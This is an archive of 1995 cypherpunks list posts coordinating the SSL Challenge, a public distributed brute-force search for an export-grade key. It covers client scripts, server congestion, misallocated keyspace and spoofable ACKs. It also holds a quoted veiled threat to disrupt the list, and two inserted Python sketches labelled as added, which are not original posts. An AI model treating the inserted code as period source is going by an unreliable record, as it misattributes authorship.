Message-ID: <Pine.SUN.3.91.950824181938.22646H-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Piete Brooks wrote:

> That's the problem -- "brclient -dklLtssl" failed to return any keys,
> [ congestion of the server :-((( ]
> so brutessl was called with just the "-" which brloop put there.

I see that can happen, but there is also:

++ brclient -dklLtssl
++ brclient -AlLtssl
++ read a
++ read a
++ nice -20 brutessl - 2977 d42f 1
usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
       brutessl [-q] -r <filename> [<no of segments>]
       brutessl [-q] -t [<hours>[:<minutes>]]
++ echo

Where apparently I did get d42f, but brutessl 1.02 choked - I am going to 
take the advice of the other poster and add the "--" to the command.
Again this is on a Linux box.  I suggest that other Linuxers check their 
logfile for this behaviour.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 15:21:49 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge: some thoughts on the process.
Message-ID: <9508242221.AA18067@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, the game's afoot, and I have a few preliminary thoughts on the 
process.

1. We need some protection against massive allocation of keys - perhaps an 
upper limit of a few hundred segments. 

Piete had better be ready to loop the server - at this rate FFFF will be 
allocated sometime tomorrow.

2. It'd be nice if the NT Winsock client could loop, reporting results and 
getting new keys automatically each 
time it finished a block. As it is, it's not worth my running it overnight. 
For each of the P5/90 NT machines I'm using, I'm manually running brutessl 
with enough key to keep them busy till morning. I'd rather have something that 
reported results to the server as it went along.

This is part of a more general problem. A lot of people are doing this on 
standalone machines at work, and have no way of checking them during the
night. This is doubly true for weekends - theoretically if someone hits 
jackpot at 6pm on Friday, we might not find out till 9am Monday. I will 
not be running on any work machines over the weekend.

3. Start time was a little ragged - 1800 GMT was named, but the server 
seemed to come up at 2PM east coast time, which is (I think) 1900 GMT. I 
think that if we selected 8AM west coast time (1600 GMT?) more people 
would come online more quickly.

4. There was a massive crush of people trying to get keys from the server 
at 2. If we ever do this again, we might think about preallocating chunks 
of keyspace to people according to their promised cpu power, and keeping
the *challenge* a secret till the starting gun sounds. Passively serving a 
page with the challenge would load the server much less than the cgi-based
key doler.

5. We needed more pre-publicity on the Net to attract participants - a 
week would have been better than 24 hours. 

just some random thoughts....


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 10:28:40 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: brloop not working
In-Reply-To: <Pine.3.89.9508241932.A6525-0100000@digit.ee>
Message-ID: <"swan.cl.cam.:150900:950824172806"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I just dont seem to get brloop working.

The server is being HAMMERED again ....

There appears to be a failure mode whereby when busy, clients call up,
say "HELO", then "QUIT" :-((

This adds to the hammering :-((

> It says:
> Command failed -- brutessl missing ?
> what seems to be wrong is that it tries to execute command:
> brutessl -

The code expects brclient to return one line which is the command line flags
for brutessl, followed by the config data.

As brclient is failing, brutessl is being called without the expected args :-(

> although brutessl does not have a command line option '-'. Why is the '-'
> there after brutessl ?

The first arg of brutessl is the file from which to read the config info.
"-" is a unix convention for the file "stdin".

SO: go grab brclient 0.12 which has a more efficient "-L" flag.
    go read http://www.brute.cl.cam.ac.uk/brute/how2run.html
	in particular, create .brloop.rc containing

		tailored=true
		checkcmds=false
		BRNAME="Jyri Kaljundi"
		BRID="jk@digit.ee"

	which will stop it checking the commands, set the ID, etc ...
	[[ NB: Other users should change BRNAME and BRID !! ]]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Thu, 24 Aug 95 15:40:51 PDT
To: cypherpunks@toad.com
Subject: Server Bottleneck
Message-ID: <9508242240.AA26478@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



The bottleneck at the server is pretty awful.  My clients are spending
most of their time in timeout, waiting for keyspace. 

Also, users on the workstations have complained that the programs eat
lots of system time, despite their being nice'd to +19...

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 15:53:09 PDT
To: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Subject: Linux fix was Re: brloop not working
In-Reply-To: <199508242146.RAA21529@gsusgi2.Gsu.EDU>
Message-ID: <Pine.SUN.3.91.950824183000.22646I-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Tom Gillman wrote:

> Use 'nice -20 brutessl -- -' instead. The '--' tells getopts() not to parse
> anything else as arguments, then the next '-' will be interpreted correctly.

I made the change, and while it still chokes when you call brutessl 
without keys (a feature, right?), it DOES work when you get a valid keyspace.

So Linux people might want to change the command in brloop if you are 
getting the same problems I was:

#:10: the actual command to do the work ....
cmd="${cmd-$brclient -dklLt$type|(read a;nice -20 $brute$type -- - \$a)|(read a;

[Huh, like, I wrote more code ;]

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Thu, 24 Aug 95 16:15:55 PDT
To: "Donald M. Kitchen" <don@cs.byu.edu>
Subject: Re: server congestion
In-Reply-To: <199508242251.QAA23003@bert.cs.byu.edu>
Message-ID: <Pine.SOL.3.91.950824191510.1011B-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Donald M. Kitchen wrote:

> You know, this is really fun. Too bad the prize isn't something really cool,
> like a free wastebasket in case Windoze 95 comes my way...

Well, if you win, then we'll chip in and get you a recycling bin.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 24 Aug 95 17:01:59 PDT
To: cypherpunks@toad.com
Subject: Linux brutessl client
Message-ID: <m0slm0V-000wQYC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


I get 11100 keys/sec with Linux/gcc 2.5.8 on a 486/66, optimized with
-O2 and -fomit-frame-pointer.

-fforce-mem and -funroll-loops made the program run more slowly.

I also tried -ffast-math -finline-functions -fforce-addr -fcaller-saves
which seemed to make no difference.


Now maybe when they get the server working again I can actually try
running this. :(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 24 Aug 95 09:54:41 PDT
To: cypherpunks@toad.com
Subject: brloop not working
Message-ID: <Pine.3.89.9508241932.A6525-0100000@digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



I just don't seem to get brloop working. It says:

Command failed -- brutessl missing ?

what seems to be wrong is that it tries to execute command:

brutessl -

although brutessl does not have a command line option '-'. Why is the '-' 
there after brutessl ?

<o       Jri Kaljundi          e-mail: jk@digit.ee         o<
 >o                             tel: +372 6308994            o>
<o       DigiTurg               http://www.digit.ee/        o<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 17:15:36 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge: Server problems
Message-ID: <9508250015.AA22053@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I can't contact the server to request keyspace anymore - I get a 
'500 Server error'

It looks like 12 hours on a P5/90 are going to waste (could have done
90 segments)


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 12:58:49 PDT
To: blane@com.eskimo
Subject: Re: Brute SSL Challenge
In-Reply-To: <Pine.SUN.3.91.950824122951.12822D-100000@eskimo.com>
Message-ID: <13157.9508241956@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



>  In the same vein, a 32 bit OS2 version would be nice.

There's a 32 bit OS2 app which TJ Hardin compiled, it's on the ftp and
web site.  It was compiled with the OS2 version of gcc.

>   I'm not sure how brutessl works exactly, but if it could connect to the 
> server, get its key assignments, and then chug away while disconnected 
> from the net I could see what kind of speed I get out of my 40MHz 486.

At the moment, there is no C code version of the client, it's perl
only, and I suspect would not work under OS/2 even with the perl for
OS2 even without a fair bit of work.

You could, however, use the WWW key doler, there's a place where you
can request keyspace.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 13:41:18 PDT
To: jered@MIT.EDU
Subject: Re: SSL CHALLENGE: 0.11 borken?
In-Reply-To: <199508242005.QAA03863@narn.atype.com>
Message-ID: <"swan.cl.cam.:219400:950824204042"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>    I had several machines running brloop 0.03 and brclient 0.11, and
> none of them appeared to be sending ACKs back to the server.

The probability of getting an ACK back is indeed small :-((

> Is this a known problem?

yes -- this is why all the WWW pages and my messages to cypherpunks say
"please get the latest code" ...

> It might account for the large number of unACKed keyspaces.

I fear so :-((

> brloop 0.04 and brclient 0.12 seem to work well, however.

Whew !

brclient 0.13 is now out to try to track down the problem which is causing the
congestion ...

It seems that old brloop's keep calling the server, and sending HELO, COMM and
then QUIT (Greet, Introduce, Part) i.e. not actually do anything :-(
[ Some only manage "HELO" or "HELO COMM" ]

These systems are hammering the server, and I suspect are the cause of the
congestion. I have added more logging to brclient 0.13, and it has caused the
problem to disappear ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 14:06:52 PDT
To: jered@mit.edu
Subject: BruteSSL: WTF? 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>
Message-ID: <13509.9508242106@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> It appears that Joe Thomas <jthomas@ogi.com> has more or less locked
> (until things start getting reassigned) most of the keyspace.  Even
> if he had a MasPar, it would still take him more than 2 days to
> check this space.  

Presumably it's just an error, never attribute to malice what can be
explained by simple error (as the saying goes).

> Does anyone know what the deal with this is?  A simple error?  A
> malicious attack? (I think that the SKSP is far to insecure to be
> effective....I could falsely ACK parts of the keyspace if I wanted
> to be mean.)

You could falsely ACK keyspace, but it's designed so that it would be
hard to do this by accident, one of the nos is a checksum, which is
trivial to calculate (for a malicious user who cared to read the
source), but 1/65536 of getting it right by accident.

It'll sort itself out tho', because the way Piete Brooks has written
it, when keyspace reaches FFFF, it starts re-assigning the ones which
aren't acked yet, so the 50000 keys will start getting assigned again.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 24 Aug 95 05:36:30 PDT
To: cypherpunks@toad.com
Subject: Crypto DLL's/SSLeay 0.4.5
Message-ID: <Pine.SOL.3.91.950824215822.9077D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Just in case people are interested, I've put the most recent version of 
my SSL (SSLeay) library up on ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/

The big difference with this release is that it builds under Windows 3.1.
The DLL's for the libraries are there as well as the ported demo programs.
I've used Borland C 4.0 and the .IDE file plus source code are in the 
distribution.

The DLL's contain routines for MD2, MD5, RC4, DES (every mode you could 
want :-), IDEA, RSA, SSL and all the X509 etc stuff that is part of life 
with SSL.  The library even compiled under MSDOS :-).

Since my code base will always be unix first, the code is not optimised 
for 16bit and probably never will be, but still, the algorithms work and 
the code is free for commercial and non-commercial use.  The applications 
need work to make them nice under Windows, but hell, I'm only writing a 
library :-).

On the PGPphone issue, personally I feel SSLphone would be a much 
better way of doing things.  If some-one has a 'voice' over modem program 
already, they should be able to slip SSL into it in only a few days.
For phone over modem, authentication is not really required and what 
exists in my library is everything required for the encryption side of 
things.

those URL's again
http://www.psy.uq.oz.au/~ftp/Crypto/
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps

eric 
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 14:14:54 PDT
To: trei@process.com ("Peter Trei")
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
Message-ID: <13538.9508242114@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Peter Trei <trei@process.com> writes on cpunks:
> My suspicion - and let me apologize in advance if I'm wrong - is
> that Mr. Thomas thinks he's allocated himself 50,000 keys, whereas
> he's actually got 838,860,800,000.

A quite plausible theory, hadn't thought of that.

> You've reserved 3/4 of the keyspace, and you're going to screw up the 
> search unless you have an NSA-sized data center.
> 
> I suggest we assume this is an error, and remove the block from the
> reserved list so that it can be re-allocated.

Piete's server is more resilient than that!

What happens is that when it reaches FFFF, it'll start doling out yet
unacked keys on the assumption that they were mistakes, or that they
were slow machines, or WWW doled ones which the user forgot to ack.

This is better for speed reasons also, as it means everybody gets
something to do right up to the end, there'll be a mad scrabble at the
end where multiple people are working on the same keyspace, as it
wraps around the remaining unacked bits of key, but the 1st person to
ack gets credited for it, and that way it gets done as quickly as
possible.

Adam
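
An added sketch (not part of this message and not the Cambridge server's code) of the allocation behaviour described here and in the earlier NOACK reply: a cap on request size as suggested elsewhere in the thread, a 16-bit checksum on ACKs, and re-issue of un-ACKed segments once the counter reaches FFFF, with the first ACK credited. The checksum function, the class and the parameter names are assumptions; the 2^24 keys per segment follows from 50,000 segments being 838,860,800,000 keys.

```python
"""Added illustration (not the Cambridge server's code): a segment doler that
caps requests, checks a 16-bit checksum on ACKs, and re-issues un-ACKed
segments after the counter reaches FFFF. Names and checksum are assumptions."""
import hashlib

SEGMENTS = 0x10000           # segments 0000..FFFF, as in the thread
KEYS_PER_SEGMENT = 1 << 24   # 838,860,800,000 keys / 50,000 segments
MAX_PER_REQUEST = 256        # hypothetical cap ("a few hundred segments")


def ack_checksum(challenge: str, start: int, count: int) -> int:
    """Hypothetical 16-bit checksum binding an ACK to one grant.

    It only stops accidents (a mistyped ACK matches 1 time in 65536);
    anyone who reads the source can compute it, as the thread points out.
    """
    digest = hashlib.sha256(f"{challenge}:{start:04x}:{count}".encode()).digest()
    return int.from_bytes(digest[:2], "big")


class KeyDoler:
    def __init__(self, challenge, segments=SEGMENTS, max_per_request=MAX_PER_REQUEST):
        self.challenge = challenge
        self.segments = segments
        self.max_per_request = max_per_request
        self.next_fresh = 0   # first segment never handed out
        self.cursor = 0       # scan position for re-issuing after wraparound
        self.credit = {}      # segment -> client whose ACK arrived first

    def allocate(self, count):
        """Return (checksum, start, n), or None when every segment is ACKed."""
        count = max(1, min(count, self.max_per_request))
        if self.next_fresh < self.segments:
            start = self.next_fresh
            n = min(count, self.segments - start)
            self.next_fresh += n
        else:
            grant = self._reissue(count)
            if grant is None:
                return None
            start, n = grant
        return ack_checksum(self.challenge, start, n), start, n

    def _reissue(self, count):
        """Fresh space is exhausted: hand out the next run of un-ACKed segments."""
        for step in range(self.segments):
            start = (self.cursor + step) % self.segments
            if start not in self.credit:
                break
        else:
            return None
        n = 1
        while n < count and start + n < self.segments and start + n not in self.credit:
            n += 1
        self.cursor = (start + n) % self.segments
        return start, n

    def ack(self, client, checksum, start, count):
        """Credit `client` for segments nobody ACKed earlier; return how many."""
        if count < 1 or start < 0 or start + count > self.next_fresh:
            raise ValueError("ACK covers segments that were never issued")
        if checksum != ack_checksum(self.challenge, start, count):
            raise ValueError("bad checksum")
        fresh = [s for s in range(start, start + count) if s not in self.credit]
        for s in fresh:
            self.credit[s] = client
        return len(fresh)

    def progress(self):
        return len(self.credit) / self.segments


def demo():
    """Constructed run on an 8-segment toy keyspace."""
    d = KeyDoler("constructed-challenge", segments=8, max_per_request=4)
    a = d.allocate(50000)      # oversized request is capped to 4 segments
    b = d.allocate(4)          # takes the rest of the fresh space
    c = d.allocate(2)          # counter wrapped: segments 0-1 are issued again
    d.ack("bob", *b)
    d.ack("carol", *c)         # carol ACKs first and gets the credit for 0-1
    late = d.ack("alice", *a)  # alice is credited only for 2-3
    return a[1:], b[1:], c[1:], late, d.credit, d.allocate(1)


if __name__ == "__main__":
    print(demo())
```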





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 14:37:03 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: brloop not working
In-Reply-To: <Pine.SUN.3.91.950824172125.22646D-100000@thrash.src.umd.edu>
Message-ID: <"swan.cl.cam.:239560:950824213618"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Ah, found the problem.  where is that "-" coming from??? [Linux]

brloop in the shell variable "cmd".

#:10: the actual command to do the work ....
cmd="${cmd-$brclient -dklLt$type|(read a;nice -20 $brute$type - \$a)|(read a;
echo '     '\$a 1>&2; echo \$a) |$brclient -AlLt$type}"

> ++ nice -20 brutessl - 2977 d42f 1
> usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
>        brutessl [-q] -r <filename> [<no of segments>]
>        brutessl [-q] -t [<hours>[:<minutes>]]
> 
> I've stopped it until I can get that fixed.  brclient is way huge now...I 
> can't see how to get rid of the "-".

"-" is the name of the <filename> -- it's a unix convention for "stdin".
brutessl 1.0 was incompatible with bruterc4 -- that was the reason for
releasing brutessl 1.01

If you are stuck with brutessl 1.0, fix cmd to be

#:10: the actual command to do the work ....
cmd="${cmd-$brclient -dklLt$type|(read a;nice -20 $brute$type -- - \$a)|(read a;
echo '     '\$a 1>&2; echo \$a) |$brclient -AlLt$type}"

i.e. prefix the "-" with "-- "




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 14:45:00 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: brloop not working
In-Reply-To: <Pine.SUN.3.91.950824172624.22646F-100000@thrash.src.umd.edu>
Message-ID: <"swan.cl.cam.:242090:950824214413"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> OK - I dig this, but brutessl on my Linux box is still complaining about 
> usage...(sorry about the bandwidth but I assume other people are probably 
> having similar problems)

OK -- I'll leave CP on the CC list then ...

+ eval brclient -dklLtssl|(read a;nice -20 brutessl - $a)|(read a;echo  
$a 1>&2;
 echo $a) |brclient -AlLtssl
++ brclient -dklLtssl
++ brclient -AlLtssl
++ read a
++ read a
++ nice -20 brutessl -

That's the problem -- "brclient -dklLtssl" failed to return any keys,
[ congestion of the server :-((( ]
so brutessl was called with just the "-" which brloop put there.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 14:52:49 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <199508242116.OAA23923@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:244760:950824215153"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Where can one observe the progress of the computations? What is 
> allocated etc?

See "inspect the current status of the search" on
http://www.brute.cl.cam.ac.uk/brute/

Note that I have disabled auto-generation of the stats file to help
reduce the congestion ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Thu, 24 Aug 95 19:54:00 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: Re: server congestion?
In-Reply-To: <"swan.cl.cam.:271770:950824230145"@cl.cam.ac.uk>
Message-ID: <199508250253.WAA24682@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu Aug 24 19:00:15 1995: you scribbled...
> 
> > Couldn't one take advantage of the 50.000 mistake, by
> > setting up a second server for that space.
> 
> The design of the prtotocol assumes a hierarchy -- maybe in the next attempt.
> 
> Static partitioning would be possible (e.g. 0000-7ffff and 8000-ffff)
> but there are problems with acking to the right server, deciding which to
> contact, etc.

It would probably be best to have the "child" servers request large
chunks of keyspace from a "parent" server.  This may require some minimal
extension to the protocol.  In particular, in the helo, you may want to
add a "client type" field which would be either "Client" or "Server".  If
it's a "Server" the parent server would keep track of the name/ip of the
"child" server.  If someone tried to ack a set of keyspace that the "child"
server was responsible for, the "parent" server would return either a 

	601 STOP <child server/port>

or perhaps a new return code  such as

	602 ACKHERE <child server/port>

The 602 code would differ from the 601 code stop in that the client could
come back to either server in the future.

This would let a real "Client" request keys from any server, but 
would have to ack back to the same server.

When the "child" server runs out of keyspace, it would get some more from
its "parent" server.  

Just my $0.02.

...alex...
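
The delegation and ACK-redirect scheme proposed above, as an added sketch that is not part of the message or of the existing protocol: a child server draws a chunk from its parent, and an ACK sent to the parent for a delegated segment is answered with 602 ACKHERE. Only that reply string comes from the message; the class, the other reply strings and the .example addresses are placeholders, and the client follows redirects only to servers it already knows, with a hop limit.

```python
"""Added illustration of the parent/child idea; not SKSP and not the
Cambridge server. Only "602 ACKHERE <server/port>" comes from the message;
the other reply strings, names and addresses are placeholders."""


class Server:
    def __init__(self, address, keyspace=None, parent=None, refill=0x100):
        self.address = address
        self.parent = parent
        self.refill = refill        # segments a child asks its parent for
        self.pool = [keyspace] if keyspace else []   # [lo, hi) not yet handed out
        self.mine = [keyspace] if keyspace else []   # ranges this server answers for
        self.children = []          # (lo, hi, child address) delegated downwards
        self.acked = {}             # segment -> first client to ACK it

    def request(self, peer_type, peer, count):
        """peer_type is the proposed HELO field: "Client" or "Server"."""
        if not self.pool and self.parent is not None:
            # A child that has run dry fetches a new chunk from its parent.
            grant = self.parent.request("Server", self.address, self.refill)
            if grant is not None:
                self.pool.append(grant)
                self.mine.append(grant)
        if not self.pool:
            return None
        lo, hi = self.pool.pop(0)
        n = max(1, min(count, hi - lo))
        if lo + n < hi:
            self.pool.insert(0, (lo + n, hi))
        if peer_type == "Server":
            self.children.append((lo, lo + n, peer))
        return lo, lo + n

    def ack(self, client, segment):
        # Delegated ranges are checked first: the child keeps the records.
        for lo, hi, child in self.children:
            if lo <= segment < hi:
                return f"602 ACKHERE {child}"
        if any(lo <= segment < hi for lo, hi in self.mine):
            self.acked.setdefault(segment, client)
            return "200 OK"          # placeholder success reply
        return "500 NOT MINE"        # placeholder error reply


def ack_following_redirects(known, first, client, segment, max_hops=4):
    """Send an ACK, following 602 replies only to servers listed in `known`."""
    address, path = first, []
    for _ in range(max_hops):
        if address not in known:
            path.append((address, "not followed: unknown server"))
            break
        reply = known[address].ack(client, segment)
        path.append((address, reply))
        if not reply.startswith("602 ACKHERE "):
            break
        address = reply.split(" ", 2)[2]
    return path


def demo():
    """Constructed two-level tree: one root, one child, two clients."""
    root = Server("root.example:4000", keyspace=(0x0000, 0x10000))
    child = Server("child.example:4001", parent=root, refill=0x100)
    known = {s.address: s for s in (root, child)}
    got = child.request("Client", "alice", 4)    # child first draws 0x100 from root
    direct = root.request("Client", "bob", 4)
    redirected = ack_following_redirects(known, root.address, "alice", got[0])
    own = ack_following_redirects(known, root.address, "bob", direct[0])
    return got, direct, redirected, own, child.acked, root.acked


if __name__ == "__main__":
    for item in demo():
        print(item)
```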



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 15:11:49 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <Pine.3.89.9508250018.A1207-0100000@digit.ee>
Message-ID: <"swan.cl.cam.:251950:950824220946"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Just a dumb question: when brutessl-brclient-brloop will find the key,
> will it report it to the keyserver right away?

IF it manages to get a word in edgeways, yes.

However, I fear some ACKS are being lost :-(

> What I mean is can I just start the brloops on my machines and log out,
> and not have to look at the display all the time?

Indeed -- it's meant to run unattended.

HOWEVER, due to the problems with losing ACKs, it would be useful to send
the output to a log file, and then check that all the scanned segments made it
to the server [[ NB: stats updates are currently manual !! ]]

> BTW how can I log brloop's output into a file and not to the screen?

sh:	brloop >> logfile 2>&1 &
csh	brloop >>& logfile &		(I think)

Aliter:	"nohup brloop &" might do it




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@eskimo.com (Brian Lane)
Date: Thu, 24 Aug 95 23:13:05 PDT
To: cypherpunks@toad.com
Subject: OS/2 Brute SSL binary
Message-ID: <199508250612.XAA12117@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



  After an evening of installing emx+gcc for OS/2 I have gotten a compiled binary to run on my machine. It's chugging away at 5100 keys/sec.

  If you want to try out my binaries, ftp over to:

  ftp.eskimo.com/~blane/brutessl/bruteos2.zip

  I have included the .exe, the .txt file and the .pf files for Hal's 2 challenges and the test.pf

  I think I have it compiled so that you don't need emx.dll on your system, but I can't test it(I have emx installed). Let me know of any problems.

  I tried the os/2 binaries from the ftp.brute... site, but they insisted on running the DOS command.com shell, and then dying with an error.

  Good luck!

    Brian

--------------------------------------------------------------------------------------
http://www.eskimo.com/~blane     |  Finger for PGP Key  |  'Space, its so roomy!'  - B. Bunny
ftp://ftp.eskimo.com/~blane         |                        |
--------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 24 Aug 95 23:22:45 PDT
To: cypherpunks@toad.com
Subject: Re: The Theory of Nymity (value of True Names)
Message-ID: <199508250622.XAA00966@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Larry Detweiler wrote:

> part of L.D.'s demonstrations were the harm that someone with
> some ingenuity, flair, malice, and boredom could wreak on any 
> cyberspatial community through the use of unrestrained 
> anonymity/pseudonymity. and it appears that some of you still
> don't get the point. perhaps another reminder or demonstration
> is in order 

Larry has from time to time attempted to prove that net 
anarchy is a bad thing, because people can engage in 
nasty pointless destructive behavior.  In addition to his 
battles with the cypherpunks list over anonymity, he has 
also argued with pretty much the entire net community 
that without a central authority it is meaningless to 
attempt to distinguish between good conduct and bad 
conduct, and has attempted to prove his thesis by actual 
demonstration.

His accounts have been repeatedly yanked, he has found 
himself under endless savage attack by a large part of 
the entire internet, and has repeatedly gone completely 
insane, possibly because of the emotional stress 
resulting from massive hostility, denigration, and 
contempt from huge numbers of people.

Of late his attacks have become more cautious and less 
likely to provoke massive retaliation. He appears to have 
recovered his sanity temporarily.

Perhaps another reminder or demonstration is in order.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 15:43:31 PDT
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <199508242151.OAA13622@quesnay.Berkeley.EDU>
Message-ID: <"swan.cl.cam.:260400:950824223105"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> How often is this updated?

whenever I type "make" -- I have disabled auto-updating while the server is
over congested ...

> So far, the only thing it shows I've acked is the keyspace I
> manually ACKed over the WWW interface (actually, I ACKed it a bunch of
> times -- the forms weren't producing responses, so I resent them a
> couple times..)

I fear that some ACKs may be lost :-((

1) use brloop 0.04 and brclient 0.13 might help
2) send stdout and stderr to a log file and scan it :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 16:03:43 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: server congestion?
In-Reply-To: <199508242214.PAA25424@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:271770:950824230145"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Couldn't one take advantage of the 50.000 mistake, by
> setting up a second server for that space.

The design of the protocol assumes a hierarchy -- maybe in the next attempt.

Static partitioning would be possible (e.g. 0000-7ffff and 8000-ffff)
but there are problems with acking to the right server, deciding which to
contact, etc.

> I guess things will screw up when the first server reaches 
> FFFF, as indicated earlier.

Yup.

> What would be nice is if one could divide up the key
> between servers also.

Hierarchy or static ?

> Another thing that might decrease the load on the server
> is if we start allocating more blocks at a time, lets
> say 2-4 blocks each time. Wouldn't that help?

I think most of the load is "HELO COMM QUIT" clients.
Yes -- we had thought of upping the allocation ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Fri, 25 Aug 95 00:07:59 PDT
To: cypherpunks@toad.com
Subject: random coincidences
Message-ID: <199508250707.AAA14271@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


What are some of the more common "coincidences" and non-random
correlations that ordinary random number generators (ones found in
